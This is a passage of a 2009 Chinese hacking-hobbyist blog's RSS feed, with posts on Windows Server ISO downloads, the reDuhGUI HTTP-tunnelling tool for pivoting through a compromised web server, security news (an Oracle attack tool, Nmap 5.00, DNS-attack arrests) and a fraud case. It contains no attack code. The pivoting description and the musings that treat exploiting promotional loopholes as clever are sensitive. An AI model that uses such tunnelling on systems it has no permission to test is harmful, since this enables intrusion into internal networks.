<p><strong>File:</strong>7600.16385.090713-1255_x64fre_server_en-us_VL-GRMSX<span >VOL</span>_EN_DVD.iso<br>
SIZE: 2,996,799,488 byte<br>
SHA1: AD855EA913AAEC3F1D0E1833C1AEF7A0DE326B0A<br>
MD5: 0207EF392C60EFDDA92071B0559CA0F9<br>
CRC: F111FF61</p>
<p><span style="color: #ff0000"><strong>Evaluation：<a href="http://www.brsbox.com/filebox/down/fc/acae1b061367acb0764764c90cbf007a" target="_blank"><span style="color: #0066cc">http://www.brsbox.com/filebox/down/fc/acae1b061367acb0764764c90cbf007a</span></a></strong></span><br>
File: 7600.16385.090713-1255_x64fre_server_eval_en-us-GRMSXEVAL_EN_DVD.iso<br>
SIZE: 2,997,100,544 bytes<br>
SHA1: 799BF8DA077A3E842AA97C990E468B3AA7BDA4EB<br>
MD5: 134F607CF4C633EF11D2576D1C635D08<br>
CRC32: 33BD62FB</p>
<p><span style="color: #ff0000"><strong>OEM：</strong></span><a href="http://www.brsbox.com/filebox/down/fc/66e46ce8a1c7997987602a8612a7e03c" target="_blank"><span style="color: #0066cc">http://www.brsbox.com/filebox/down/fc/66e46ce8a1c7997987602a8612a7e03c</span></a><br>
<strong>SIZE</strong>: 2,79G (2 996 783 104 Byte)<br>
<strong>SHA1</strong>: 515a9e7f4c7df41aaca6872cb806dabd15bf7d64<br>
<strong>MD5</strong>: 4ffb420543f5a9265be5eedb6c4e55a2<br>
<strong>CRC32</strong>: 137a659f</p>
<p><span style="color: #ff0000"><strong>HYPER-V：<a href="http://www.brsbox.com/filebox/down/fc/57461848a4451fbf73a823cdd7c29750" target="_blank"><span style="color: #0066cc">http://www.brsbox.com/filebox/down/fc/57461848a4451fbf73a823cdd7c29750</span></a></strong></span><br>
FILE: GRMHVxFRE1_DVD.iso<br>
SIZE: 1,615,949,824 byte<br>
SHA1: D9883263247AE2877FC8E40A0CB7FAFED202F162<br>
MD5: 6226D6A0F124D9623BADF72D18430F81<br>
CRC: 2C884FB4</p>
<div>7600.16385.090713-1255_x64fre_server_All_Language_<span >Pack</span>s_No_ZH-TW.iso<br>
SHA1:9791594631adf24be12e87ccc274e13f60890d26<br>
MD5:ee9a3589f27129c6d5f3ae57e02c2560<br>
CRC32:8e289a2f</div>
<p>7600.16385.090713-1255_x64fre_server_Language_Pack_ZH-TW.iso<br>
SHA1:25a5687634bacf9a11e2c95304ea6958ec808623<br>
MD5:3bb25a1a9b96af81582523b51ade06a9<br>
CRC32:932a88e0</p>
 <a href="http://hi.baidu.com/hackloft/blog/item/6504f834675e89325bb5f59a.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/6504f834675e89325bb5f59a.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-01  03:31</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/6504f834675e89325bb5f59a.html</guid>
</item>

<item>
        <title><![CDATA[reDuhGUI]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/9f5d5bd4a9530608a18bb7ec.html]]></link>
        <description><![CDATA[
		
		<p>作者：<a href="http://www.nosec.org/zh-hans/reDuhGUI" target="_blank"><font color="#0b59b2">zwell</font></a></p>
<p>reDuh最开始是由SensePost在BlackHat USA 2008会议上发表的一个议题中的一部分。它的出现是针对当前Web安全渗透测试经常会面临的一个问题，同时也是Web服务器加固方面一个很重要的部分， 那就是Web服务器对外只开放一个80端口。Web服务器的安全防护可以是操作系统的端口定制或者是网管防火前的端口定制。这时渗透测试人员如果想进一步 测试内网的话必须先拿下目标服务器并拥有一定的控制权限。<strong>reDuh GUI</strong>是由诺赛科技从原有的JAVA语言上移植到C++语言的一个Windows GUI版本，具有如下一些特性：</p>
<ul>
    <li>不需要JAVA运行环境</li>
    <li>可视化操作</li>
    <li>支持HTTP/HTTPS</li>
    <li>支持二级代理</li>
</ul>
<p>以前渗透测试人员常用的一些方法是通过上传一些针对操作系统的可执行文件到目标服务器，并且必须要通过进程的方式执行该程序。这就存在两个问题：1、通过 渗透测试拿到的权限不一定允许执行进程；2、目标服务器的种类可能很多，比如Windows、Linux、Solaris等等，且对于库依赖性比较强，这 样就要求渗透测试人员必须维护一个不小的程序库以满足渗透测试的场景。<br>
事实上，我们容易忽略的一点就是，其实脚本代码本身就支持SOCKET套接字的操作，它完全可以制作成为一个SOCKET中转代理（当然这也是有一定的限 制的，就比如在PHP中需要启用SOCKET模块）。那么这种代理是可以直接绕过防火墙进入到内网的。我们举个现实生活中比较常见的例子说明：A是一台 web服务器，B是与A在同一内网一个文件服务器，由于工作需要及简化操作，B的文件访问是对内网公开的，也就是没有任何的认证要求。同时为了保证B服务 器的安全性，在网关防火墙上做了端口过滤：只允许外网访问A的80端口。这时我们如果想要从测试点访问B，传统的做法是控制A，上传执行文件，做一个程序 级的端口转发器。假设目标服务器根本就不允许从web上来的请求执行程序，换句话说是不允许执行进程，那么我们就没有办法拿到B的文件了吗？这里，我们就 可以想到reDuh了。<br>
<a href="http://huaidan.org/wp-content/uploads/2009/07/reduh_workflow.png"><img class="alignnone size-full wp-image-3234" title="reduh_workflow" height="353" alt="reduh_workflow" src="http://huaidan.org/wp-content/uploads/2009/07/reduh_workflow.png" width="610"></a></p>
<p>由图示上我们也可以看出，从MSTSC客户端到目标的Terminal服务器中间其实是走了一个这样的流程：<br>
Mstsc客户端--&gt;reDuh代理--&gt;HTTP tunne--&gt;Web服务器--&gt;Terminal服务器<br>
当然，对于MSTSC客户端而言，这些过程都是透明的，我们只需要在MSTSC中指定连接的端口为本地reDuh监听的端口即可。</p>
<p><a href="http://huaidan.org/wp-content/uploads/2009/07/reduh_main.png"><img class="alignnone size-full wp-image-3235" title="reduh_main" height="354" alt="reduh_main" src="http://huaidan.org/wp-content/uploads/2009/07/reduh_main.png" width="523"></a></p>
<p><strong>下载地址：</strong><a href="http://down2.nosec.org/reDuhGUI_0.1.rar"><font color="#0b59b2">reDuhGUI_0.1.rar</font></a>（详细信息请查看程序包中的帮助文档）</p> <a href="http://hi.baidu.com/hackloft/blog/item/9f5d5bd4a9530608a18bb7ec.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%CD%F8%C2%E7%C9%F8%CD%B8%BC%BC%CA%F5">网络渗透技术</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/9f5d5bd4a9530608a18bb7ec.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-29  02:40</pubDate>
        <category><![CDATA[网络渗透技术]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/9f5d5bd4a9530608a18bb7ec.html</guid>
</item>

<item>
        <title><![CDATA[Black Hat和Defcon & Chris Gates & oracle]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/f238bd2201bb54ad4723e84e.html]]></link>
        <description><![CDATA[
		
		<p class="newtext">Black Hat和Defcon黑客会议下周将在拉斯维加斯举行,已经有安全专家放出话来称他们将在会上发布一个用于闯入Oracle数据库的工具.</p>
<p class="newtext">其实这两位安全人员Chris Gates和Mario Ceballo本身都是研究Metasploit project的专家.Defcon网站已经宣布了这一消息,安全人员表示他们已经攻破了甲骨文的Metasploit辅助模块,但发布工具的主要目的是帮助企业确定自己的系统薄弱点.</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/f238bd2201bb54ad4723e84e.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-24  22:45</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/f238bd2201bb54ad4723e84e.html</guid>
</item>

<item>
        <title><![CDATA[80后女孩盗卖40多套经适房购宝马买豪宅[漏洞?犯法]]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/30e5e9db4f19396fd1164e79.html]]></link>
        <description><![CDATA[
		
		<p>半夜起床RSS弹了这篇文章, 随想,如果没有私刻公章伪造他人身份等这些罪名,如果是商业模式漏洞被某人研究出来并成功利用 这个应该算违法 还是合法？或者说是个人的智商给自己带来的财富？比如某超市搞活动一天一个人只能买打折的黄金10克 但没有登记身份证或者购买者信息,那么夸张点说某人抓住了这个活动漏洞重复购买打折黄金两吨 暴富 这个情况违法么?当然这只是一个比喻，&quot;这么明显的商业漏洞也许根本不存在&quot; 但是真的不存在吗？</p>
<p>某日发现超市门前一年轻人推了一车(超市购物车)食用油，同时看到超市打折活动POP海报 某某品牌食用油下午5:00-7:00活动 3折 下面一行小字没人限1桶 我就对这年轻人进行观察分析</p>
<p>他们一家4口 轮番上阵 对多个结算口 这家超市有 18个结算口</p>
<p>18个结算口*4个人每人一次*每人一桶 这个公式大家知道怎么出来的了</p>
<p>这是一个很巧妙的漏洞利用方案或者说是渗透方案,他们考虑到了收银员看他们面熟的问题，一个收银员只和他们家人见一次面。</p>
<p>那么不要问这么多油吃不吃的完?我觉得这种怀疑是没必要的 就像权限拿到手了人家是想通知管理员 还是自己做些其他事情 这是人家的事情了，这件事中，也许人家开的就是个卖油的铺子，凑上这机会当一次小规模进货了。</p>
<p>同样 火车票补卧铺票 登记了身份证排队 但是喊了名字 某人回答 &quot;我就是&quot; 乘务员也没再检查身份证，没检查是否和登记的身份证一致，接下来李逵来了就出乱子了，李鬼已经进入梦乡。</p>
<p>那么我扯这么多要表达什么呢？&nbsp;&nbsp;  就是想讲 这样的漏洞的出现 甚至漏洞被利用 我始终想不明白责任在谁这个问题?</p>
<p>下面的文章大家看看吧, 这80后女孩开启了一个社会漏洞与社会漏洞被利用的新篇章 :)</p>
<p>===================================================================</p>
<p>不到两年的时间里，北京26岁女孩梁静自设&ldquo;售楼处&rdquo;，盗卖40多套北京回龙观的经适房，揽财1400余万元。上当的购房者装修完新房入住一年多后才突然获悉，自家房屋钥匙是梁静骗出来的。</p>
<p>　　<strong>80后女孩蒙钱1400余万</strong></p>
<p>　　梁静1983年出生，北京人。检方指控，2006年至2008年期间，梁静假冒北京首开天鸿集团有限公司工作人员，假称自己能买到回龙观的经济适用房，先后骗取数十名被害人的购房款共1400余万元。</p>
<p>　　18日，与梁静一起站在被告席上的还有她的男友王乐、梁静一闺密的男友刘涛。检方指控，梁静诈骗过程中，刘涛多次冒充北京首开天鸿集团有限公司工作人员，为其诈骗提供帮助。第三被告王乐，被控&ldquo;在梁静被抓后紧急转移梁静用赃款购买的萨博、宝马汽车以及部分赃款&rdquo;。</p>
<p>　　<strong>钻行业漏洞设售楼骗局</strong></p>
<p>　　庭审材料披露，梁静&ldquo;一夜暴富&rdquo;的神话之所以能够轻易实现，缘于她熟知并利用了经适房出售的行业漏洞。</p>
<p>　　梁静曾在一家房地产公司当过售楼小姐。发现出售经适房是一个赚钱机会，她设置了一个&ldquo;售楼处&rdquo;行骗。此前，她在做售楼小姐时熟知，销售公司可电话指令物业公司带业主看房，并交接钥匙。利用这一行业漏洞，她临摹了天鸿卓越房地产公司有关负责人的名字，并私刻了该公司的公章，要求物业公司允许购房人看房，并送来钥匙。随后，梁静将钥匙交给购房者，完成&ldquo;交房&rdquo;。</p>
<p>　　<strong>得手后购宝马买豪宅</strong></p>
<p>　　有人&ldquo;买&rdquo;房后，梁静的&ldquo;神通广大&rdquo;很快在购房者中间口口相传，一些打算买经适房的人托朋友拉关系找到梁静。其中一位郑女士，一次就介绍5个人找梁静买房，结果被骗109万元。案发时，已有49位购房者交完房款并在梁静处办理了&ldquo;入住&rdquo;手续，一些业主甚至装修好房屋，在新房住了一年多。</p>
<p>　　梁静归案后承认，收取购房人大笔房款后，除了给自己购买宝马车外，还给男友王乐购买了价值12万元的手表、萨博牌小轿车。其余赃款，大方的她给男友家人购置了房产。此案未当庭宣判。</p>
<p>　　<strong>购房人将起诉物业</strong></p>
<p>　　每个受害人背后都有一把辛酸泪。即便这样，他们中的很多人却并不怨恨梁静。这些人认为，梁静最后还是为他们办了入住手续，他们也拿到了房子，关键问题在于物业公司，这家公司工作失误，才导致他们的房子被收回。一些购房人表示将与物业公司打民事官司，讨要自己的新房。</p>
<p>　　&ldquo;我对打官司很有信心。&rdquo;一名受害人说，她掌握了很多证据，包括一份最新证据，即物业公司收取了她新一年度物业费后出具的收费凭证，上面有物业公司的章。</p>
<p> </p>
<p>====================================================================</p>
<p>&nbsp;&nbsp;</p> <a href="http://hi.baidu.com/hackloft/blog/item/30e5e9db4f19396fd1164e79.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/30e5e9db4f19396fd1164e79.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-22  03:20</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/30e5e9db4f19396fd1164e79.html</guid>
</item>

<item>
        <title><![CDATA[网络安全扫描工具Nmap 5.00发布]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/606d7d4bc23410f982025c3b.html]]></link>
        <description><![CDATA[
		
		<table width="97%" align="center">
    <tbody>
        <tr>
        </tr>
    </tbody>
</table>
<div >
<p>开源网络安全扫描工具Nmap正式发布了5.00版，这是自1997年以来最重要的发布，代表着Nmap从简单的网络连接端扫描软件变身为全方面的安全和网络工具组件。</p>
<p>Nmap于1997年9月推出，支持Linux、Windows、Solaris、BSD、Mac OS X、AmigaOS系统，采用GPL许可证，最初用于扫描开放的网络连接端，确定哪服务运行在那些连接端，它是评估网络系统安全的重要软件，也是黑客常用的工具之一。新的Nmap 5.00版大幅改进了性能，增加了大量的脚本。例如Nmap现在能登录进入Windows，执行本地检查(PDF)，能检测出臭名昭著的 Conficker蠕虫。其它的主要特性包括：用于数据传输，重定向和调试的新Ncat工具，Ndiff快速扫描比较工具，高级GUI和结果浏览器 Zenmap等。</p>
<table width="97%" align="center" border="0">
    <tbody>
        <tr>
            <td colspan="3">
            <div align="center">
            
            </div>
            </td>
        </tr>
    </tbody>
</table>

<p><a href="http://nmap.org/download.html" target="_blank">下载</a></p>
</div> <a href="http://hi.baidu.com/hackloft/blog/item/606d7d4bc23410f982025c3b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%CD%F8%C2%E7%C9%F8%CD%B8%BC%BC%CA%F5">网络渗透技术</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/606d7d4bc23410f982025c3b.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-19  01:46</pubDate>
        <category><![CDATA[网络渗透技术]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/606d7d4bc23410f982025c3b.html</guid>
</item>

<item>
        <title><![CDATA[PHP未明远程任意文件上传漏洞]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/2f01d70869ac7e39e92488a9.html]]></link>
        <description><![CDATA[
		
		<div class="articleBody">
<p>鸟的 , 不帖了</p>
<p>这样看</p>
<p><a href="http://sec.chinabyte.com/313/9008313.shtml">http://sec.chinabyte.com/313/9008313.shtml</a>&nbsp;&nbsp;  <span >2009-07-18 13:52 来源：中国IT实验室 </span></p>
<p><span > * 请注意 Chinabyte 09年7月18日 发布了转载 来自IT实验室的文章</span></p>
<p> </p>
<p><span >再看</span></p>
<p><span ><a href="http://www.51cto.com/art/200508/7169.htm" target="_blank"><font size="3">PHP处理RFC1867 MIME格式导致数组错误漏洞_51CTO.COM_领先的中文I..</font></a><br>
<font size="-1">安全系统:PHP PHP 5.0.2 PHP PHP 4.3.9 漏洞报告人: Stefano Di Paola 漏洞描述:<font color="#c60a00">BUGTRAQ</font> <font color="#c60a00">ID:</font> <font color="#c60a00">11190</font> PHP是一种流行的WEB服务器端编程语言。 PHP在处理RFC1867 MIME数据的时候存在漏洞,远程攻击者可以利用这个漏洞覆盖一些内存数据... <br>
<font color="#008000">www.51cto.com/art/200508/7169.htm 54K 2007-9-24 </font>- <a class="m" href="http://cache.baidu.com/c?m=9f65cb4a8c8507ed4fece763105392230e54f7643f86964868d4e419ce3b46120720febb25201706d9d8796405a45e5c9daa702d23467df7cdc7d80d88fdd27b6c9f27452b4a914062c418dcdc4654c2239351eb&amp;p=8b2a905d9d9518ff57ea962a485e&amp;user=baidu" target="_blank"><font color="#666666">百度快照</font></a>&nbsp;&nbsp;  </font></span></p>
<p><span ><font size="-1">*注意07年有快照<br>
</font></span></p>
<p><span ><font size="-1">再看</font></span></p>
<p><span ><font size="-1"><a href="http://www.securityfocus.com/bid/11190/discuss">http://www.securityfocus.com/bid/11190/discuss</a></font></span></p>
<p><span ><font size="-1">...几天也标题党一回 标的多可以挂广告呢!</font></span></p>
</div> <a href="http://hi.baidu.com/hackloft/blog/item/2f01d70869ac7e39e92488a9.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D6%AA%CA%B6%D6%AA%CA%B6">知识知识</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/2f01d70869ac7e39e92488a9.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-18  15:01</pubDate>
        <category><![CDATA[知识知识]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/2f01d70869ac7e39e92488a9.html</guid>
</item>

<item>
        <title><![CDATA[偶遇Virtual PC...]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/f01a470ad42e7e1695ca6bfd.html]]></link>
        <description><![CDATA[
		
		<p>坚持了很长时间vmware，一直以来也拥护着vmware</p>
<p>但是到6.5版我的破T42笔记本已经根本跑不动了</p>
<p>Vpc开启主进程占用内存仅15m 感觉像开了3分之一的QQ2009 微软的虚拟化技术还真的是牛逼 操作的速度真的太快了 感动</p>
<p>差分硬盘的功能早就听说很牛逼 今天也试了下</p>
<p>我的T42终于可以再跑多系统了</p>
<p>感动的眼泪哗哗的 <img src="http://img.baidu.com/hi/jx/j_0028.gif"></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/f01a470ad42e7e1695ca6bfd.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-16  13:05</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/f01a470ad42e7e1695ca6bfd.html</guid>
</item>

<item>
        <title><![CDATA[&#34;5&#12539;19&#34;六省份网络故障系人为攻击 8名&#34;黑客&#34;在浙江落网]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/9cdb30fe4fc8f0385d600842.html]]></link>
        <description><![CDATA[
		
		<p>　　今年5月19日晚间时分，浙江、江苏、安徽等6省陆续出现互联网网络故障，部分互联网用户的服务受到影响。5月29日，涉嫌破坏计算机信息系统的王某等8名&ldquo;黑客&rdquo;相继在金华、温州等地落网。</p>
<p>　 　据了解，2009年1月份，犯罪嫌疑人王某在互联网上租用服务器，通过协助他人攻击网络游戏&ldquo;私服&rdquo;和&ldquo;私服&rdquo;广告网站进行非法牟利。5月19日，王某 指使犯罪嫌疑人徐某、徐某某两人对三个网络游戏&ldquo;私服&rdquo;广告网站的域名解析服务器实施攻击。其中一台域名解析服务器设在江苏常州，同时为某一知名软件官方 网站提供域名解析，王某等人的攻击造成了该服务器域名解析请求拥塞，进而导致浙江、江苏、安徽等6省互联网出现严重网络故障，20余个省份互联网域名解析 服务无法正常工作，大量网民无法正常访问网站。新闻阅读：《内地网络遭遇集体&ldquo;大塞车&rdquo; 故障已超24小时》</p>
<p>　　浙江省公安厅网警总队总队长丁仁仁介绍，由于网络犯罪成本低、收益大，再加上网民防范意识差，导致当前网络违法犯罪活动呈上升趋势。</p>
<p>　 　据统计，今年上半年，全省公安网警部门共侦破各类网络犯罪案件142起，其中网络淫秽案件53起、网络诈骗48起、网络盗窃24起、网络赌博6起，端掉 犯罪团伙96个，捣毁非法网站153个，抓获犯罪嫌疑人172名。上半年全省网警部门受理网络犯罪案件数346起，比去年同期上升了105%，其中网络诈 骗、网络盗窃等侵财型案件的增幅达146%，网络淫秽、网络赌博案件增幅超过110%。</p>
<p>　　同时网络犯罪也呈现出种类增多，手段翻新，匿名、跨区域等网络技术特征明显，团伙犯罪等特征。</p>
<p>　　公安网警部门打击网络犯罪的同时，广大网民要规范自身的网络行为，抵制各种网上不良低俗信息和&ldquo;天上馅饼&rdquo;信息的诱惑，不给犯罪分子留下作案的机会。</p>
公安网警部门也希望广大网民积极向公安机关举报网络犯罪活动线索 <a href="http://hi.baidu.com/hackloft/blog/item/9cdb30fe4fc8f0385d600842.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/9cdb30fe4fc8f0385d600842.html#comment">查看评论</a>]]></description>
        <pubDate>2009-07-11  12:51</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/9cdb30fe4fc8f0385d600842.html</guid>
</item>


</channel>
</rss>